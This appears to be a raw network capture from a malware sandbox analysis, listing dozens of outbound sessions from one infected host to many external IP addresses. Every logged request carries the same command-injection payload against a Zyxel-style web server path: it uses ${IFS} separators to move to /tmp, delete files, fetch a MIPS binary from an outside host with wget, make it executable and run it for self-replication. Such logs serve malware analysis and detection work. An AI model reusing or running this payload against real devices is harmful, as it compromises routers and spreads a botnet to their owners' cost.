                                                  Jan 19, 2024 18:23:56.059128046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4450192.168.2.1355958121.73.163.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059175014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4451192.168.2.1348088122.158.92.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059210062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4452192.168.2.134316825.110.202.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059259892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4453192.168.2.134902272.73.179.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059300900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4454192.168.2.134936888.190.13.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059354067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4455192.168.2.134586445.169.130.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059386015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4456192.168.2.1343274126.18.18.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059429884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4457192.168.2.1335716194.64.47.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059472084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4458192.168.2.13525325.193.212.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059511900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4459192.168.2.135385084.167.120.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059540987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4460192.168.2.1346152205.27.43.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059583902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4461192.168.2.1338878119.37.196.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059606075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4462192.168.2.1339194205.138.128.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059659958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4463192.168.2.1338434222.116.231.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059691906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4464192.168.2.1353508132.116.208.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059705019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4465192.168.2.133781059.133.228.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059756994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4466192.168.2.1336626204.56.165.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059793949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4467192.168.2.1345890193.117.163.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059829950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4468192.168.2.134866225.184.183.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059858084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4469192.168.2.1333864209.241.227.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059890032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4470192.168.2.1345612117.104.147.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059942007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4471192.168.2.1334704208.160.209.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059989929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4472192.168.2.1354858220.22.236.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060020924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4473192.168.2.134995419.63.149.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060054064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4474192.168.2.1360286206.39.171.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060084105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4475192.168.2.1345350164.187.159.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060121059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4476192.168.2.135953646.30.145.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060159922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4477192.168.2.1346572132.165.70.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060175896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4478192.168.2.1341204170.6.177.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060199022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4479192.168.2.1356610154.65.61.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060270071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4480192.168.2.135374847.208.231.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060301065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4481192.168.2.1349916122.123.101.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060319901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4482192.168.2.135838692.86.135.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060365915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4483192.168.2.133418632.213.220.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060385942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4484192.168.2.1340856107.61.182.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060436010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4485192.168.2.1344554210.12.87.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060477972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4486192.168.2.134560252.102.212.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060525894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4487192.168.2.135864646.93.49.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060555935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4488192.168.2.1354952185.160.51.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060602903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4489192.168.2.1354864113.216.186.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060632944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4490192.168.2.135136097.139.39.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060688019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4491192.168.2.1338162120.42.42.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060743093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4492192.168.2.1334198163.19.251.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060784101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4493192.168.2.13381068.103.129.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060844898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4494192.168.2.135799024.35.229.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060889959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4495192.168.2.1339370156.78.41.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060911894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4496192.168.2.135888063.9.194.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060944080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4497192.168.2.1347592109.253.54.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.060966969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4498192.168.2.136082831.217.8.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061012983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4499192.168.2.1339856209.117.15.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061074018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4500192.168.2.133577437.181.177.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061109066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4501192.168.2.1336104212.36.121.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061140060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4502192.168.2.134310693.111.109.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061173916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4503192.168.2.1342960156.73.36.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061203003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4504192.168.2.1335398114.213.156.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061244011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4505192.168.2.134855248.151.103.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061284065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4506192.168.2.135826866.102.119.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061300039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4507192.168.2.133521887.178.93.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061359882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4508192.168.2.134800451.171.109.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061398983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4509192.168.2.1350128204.107.111.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061444998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4510192.168.2.135646441.118.56.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061501980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4511192.168.2.136048482.41.193.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061528921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4512192.168.2.1358968115.64.87.125443
                                                  TimestampBytes transferredDirectionData
